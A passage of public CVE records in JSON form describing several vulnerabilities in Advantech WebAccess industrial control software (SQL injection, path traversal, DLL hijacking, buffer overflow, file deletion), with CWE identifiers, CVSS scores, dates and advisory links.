"problemtype_data": [ { "description": [ { "lang": "eng", "value": "Cross-site Scripting" } ] } ] }, "references": { "reference_data": [ { "name": "45774", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/45774/" }, { "name": "https://www.tenable.com/security/research/tra-2018-35", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2018-35" } ] } } } }, "cveMetadata": { "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "assignerShortName": "tenable", "cveId": "CVE-2018-15707", "datePublished": "2018-10-31T22:00:00Z", "dateReserved": "2018-08-22T00:00:00", "dateUpdated": "2024-09-16T22:50:29.453Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-14806
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securitytracker.com/id/1041939 | vdb-entry, x_refsource_SECTRACK | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01%2C | x_refsource_MISC | |
http://www.securityfocus.com/bid/105728 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | Advantech WebAccess |
Version: WebAccess Versions 8.3.1 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T09:38:13.975Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "1041939", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1041939" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01%2C" }, { "name": "105728", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/105728" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess Versions 8.3.1 and prior" } ] } ], "datePublic": "2018-10-23T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess 8.3.1 and earlier has a path traversal vulnerability which may allow an attacker to execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-22", "description": "IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY (\u0027PATH TRAVERSAL\u0027) CWE-22", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-10-25T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "1041939", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1041939" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01%2C" }, { "name": "105728", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/105728" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-10-23T00:00:00", "ID": "CVE-2018-14806", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "WebAccess Versions 8.3.1 and prior" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess 8.3.1 and earlier has a path traversal vulnerability which may allow an attacker to execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY (\u0027PATH TRAVERSAL\u0027) CWE-22" } ] } ] }, "references": { "reference_data": [ { "name": "1041939", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1041939" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01,", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01," }, { "name": "105728", "refsource": "BID", "url": "http://www.securityfocus.com/bid/105728" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-14806", "datePublished": "2018-10-23T20:00:00Z", "dateReserved": "2018-08-01T00:00:00", "dateUpdated": "2024-09-16T20:32:50.100Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-10591
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/104190 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T07:39:08.407Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } ], "datePublic": "2018-05-15T00:00:00", "descriptions": [ { "lang": "en", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an origin validation error vulnerability has been identified, which may allow an attacker can create a malicious web site, steal session cookies, and access data of authenticated users." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-346", "description": "ORIGIN VALIDATION ERROR CWE-346", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-05-17T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-05-15T00:00:00", "ID": "CVE-2018-10591", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an origin validation error vulnerability has been identified, which may allow an attacker can create a malicious web site, steal session cookies, and access data of authenticated users." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "ORIGIN VALIDATION ERROR CWE-346" } ] } ] }, "references": { "reference_data": [ { "name": "104190", "refsource": "BID", "url": "http://www.securityfocus.com/bid/104190" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-10591", "datePublished": "2018-05-15T22:00:00Z", "dateReserved": "2018-05-01T00:00:00", "dateUpdated": "2024-09-16T18:19:27.437Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-7501
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/104190 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T06:31:03.629Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } ], "datePublic": "2018-05-15T00:00:00", "descriptions": [ { "lang": "en", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several SQL injection vulnerabilities have been identified, which may allow an attacker to disclose sensitive information from the host." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-89", "description": "IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND (\u0027SQL INJECTION\u0027) CWE-89", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-05-17T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-05-15T00:00:00", "ID": "CVE-2018-7501", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several SQL injection vulnerabilities have been identified, which may allow an attacker to disclose sensitive information from the host." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND (\u0027SQL INJECTION\u0027) CWE-89" } ] } ] }, "references": { "reference_data": [ { "name": "104190", "refsource": "BID", "url": "http://www.securityfocus.com/bid/104190" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-7501", "datePublished": "2018-05-15T22:00:00Z", "dateReserved": "2018-02-26T00:00:00", "dateUpdated": "2024-09-16T20:21:58.642Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-4215
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T07:17:12.201Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-285-15" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "9.1.3" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Elcazators" } ], "datePublic": "2023-10-12T16:20:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Advantech WebAccess version 9.1.3 contains an exposure of sensitive information to an unauthorized actor vulnerability that could leak user credentials." } ], "value": "Advantech WebAccess version 9.1.3 contains an exposure of sensitive information to an unauthorized actor vulnerability that could leak user credentials." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-1295", "description": "CWE-1295: Debug Messages Revealing Unnecessary Information", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-24T16:33:13.871Z", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-285-15" } ], "solutions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eAdvantech recommends users update WebAccess to \u003c/span\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.advantech.com/en/support/details/installation?id=1-MS9MJV\"\u003eVersion 9.1.4\u003c/a\u003e\n\n\u003cbr\u003e" } ], "value": "Advantech recommends users update WebAccess to Version 9.1.4 https://www.advantech.com/en/support/details/installation" } ], "source": { "advisory": "ICSA-23-285-15", "discovery": "EXTERNAL" }, "title": "Advantech WebAccess Debug Messages Revealing Unnecessary Information", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2023-4215", "datePublished": "2023-10-16T23:40:37.761Z", "dateReserved": "2023-08-07T19:13:54.357Z", "dateUpdated": "2024-10-24T16:33:13.871Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-5154
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2017-04 | x_refsource_MISC | |
http://www.securityfocus.com/bid/95410 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-17-012-01 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess 8.1 |
Version: Advantech WebAccess 8.1 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T14:55:34.985Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2017-04" }, { "name": "95410", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/95410" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-012-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess 8.1", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess 8.1" } ] } ], "datePublic": "2017-02-13T00:00:00", "descriptions": [ { "lang": "en", "value": "An issue was discovered in Advantech WebAccess Version 8.1. To be able to exploit the SQL injection vulnerability, an attacker must supply malformed input to the WebAccess software. Successful attack could result in administrative access to the application and its data files." } ], "problemTypes": [ { "descriptions": [ { "description": "Advantech WebAccess SQL injection", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-11-02T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2017-04" }, { "name": "95410", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/95410" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-012-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-5154", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess 8.1", "version": { "version_data": [ { "version_value": "Advantech WebAccess 8.1" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Advantech WebAccess Version 8.1. To be able to exploit the SQL injection vulnerability, an attacker must supply malformed input to the WebAccess software. Successful attack could result in administrative access to the application and its data files." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Advantech WebAccess SQL injection" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2017-04", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2017-04" }, { "name": "95410", "refsource": "BID", "url": "http://www.securityfocus.com/bid/95410" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-012-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-012-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-5154", "datePublished": "2017-02-13T21:00:00", "dateReserved": "2017-01-03T00:00:00", "dateUpdated": "2024-08-05T14:55:34.985Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-6554
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | WebAccess/SCADA |
Version: Versions 8.3.5 and prior. |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T20:23:21.684Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess/SCADA", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "Versions 8.3.5 and prior." } ] } ], "datePublic": "2019-04-02T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess/SCADA, Versions 8.3.5 and prior. An improper access control vulnerability may allow an attacker to cause a denial-of-service condition." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-284", "description": "IMPROPER ACCESS CONTROL CWE-284", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2019-04-05T18:15:35", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-6554", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess/SCADA", "version": { "version_data": [ { "version_value": "Versions 8.3.5 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess/SCADA, Versions 8.3.5 and prior. An improper access control vulnerability may allow an attacker to cause a denial-of-service condition." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER ACCESS CONTROL CWE-284" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-6554", "datePublished": "2019-04-05T18:15:35", "dateReserved": "2019-01-22T00:00:00", "dateUpdated": "2024-08-04T20:23:21.684Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-5175
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/96210 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-17-045-01 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | ICS-CERT | Advantech WebAccess Versions 8.1 and prior. |
Version: Advantech WebAccess Versions 8.1 and prior. |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T14:55:35.371Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "96210", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/96210" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-045-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess Versions 8.1 and prior.", "vendor": "ICS-CERT", "versions": [ { "status": "affected", "version": "Advantech WebAccess Versions 8.1 and prior." } ] } ], "datePublic": "2017-02-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess 8.1 and earlier contains a DLL hijacking vulnerability which may allow an attacker to run a malicious DLL file within the search path resulting in execution of arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-427", "description": "UNCONTROLLED SEARCH PATH ELEMENT CWE-427", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-05-10T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "96210", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/96210" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-045-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2017-02-14T00:00:00", "ID": "CVE-2017-5175", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess Versions 8.1 and prior.", "version": { "version_data": [ { "version_value": "Advantech WebAccess Versions 8.1 and prior." } ] } } ] }, "vendor_name": "ICS-CERT" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess 8.1 and earlier contains a DLL hijacking vulnerability which may allow an attacker to run a malicious DLL file within the search path resulting in execution of arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "UNCONTROLLED SEARCH PATH ELEMENT CWE-427" } ] } ] }, "references": { "reference_data": [ { "name": "96210", "refsource": "BID", "url": "http://www.securityfocus.com/bid/96210" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-045-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-045-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-5175", "datePublished": "2018-05-09T19:00:00Z", "dateReserved": "2017-01-03T00:00:00", "dateUpdated": "2024-09-17T02:01:34.846Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-0860
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.zerodayinitiative.com/advisories/ZDI-16-074 | x_refsource_MISC | |
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC | |
http://www.zerodayinitiative.com/advisories/ZDI-16-058 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T22:30:05.038Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-074" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-058" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Buffer overflow in the BwpAlarm subsystem in Advantech WebAccess before 8.1 allows remote attackers to cause a denial of service via a crafted RPC request." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-12-02T20:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-074" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-058" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2016-0860", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Buffer overflow in the BwpAlarm subsystem in Advantech WebAccess before 8.1 allows remote attackers to cause a denial of service via a crafted RPC request." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-074", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-074" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-058", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-058" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-0860", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-12-17T00:00:00", "dateUpdated": "2024-08-05T22:30:05.038Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-3941
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2019-15 | x_refsource_MISC | |
http://www.securityfocus.com/bid/107847 | vdb-entry, x_refsource_BID |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:26:27.534Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2019-15" }, { "name": "107847", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/107847" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "8.3.4" } ] } ], "datePublic": "2019-04-04T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess 8.3.4 allows unauthenticated, remote attackers to delete arbitrary files via IOCTL 10005 RPC." } ], "problemTypes": [ { "descriptions": [ { "description": "Unrestrived File Deletion", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-04-10T15:06:14", "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "shortName": "tenable" }, "references": [ { "tags": [ "x_refsource_MISC" 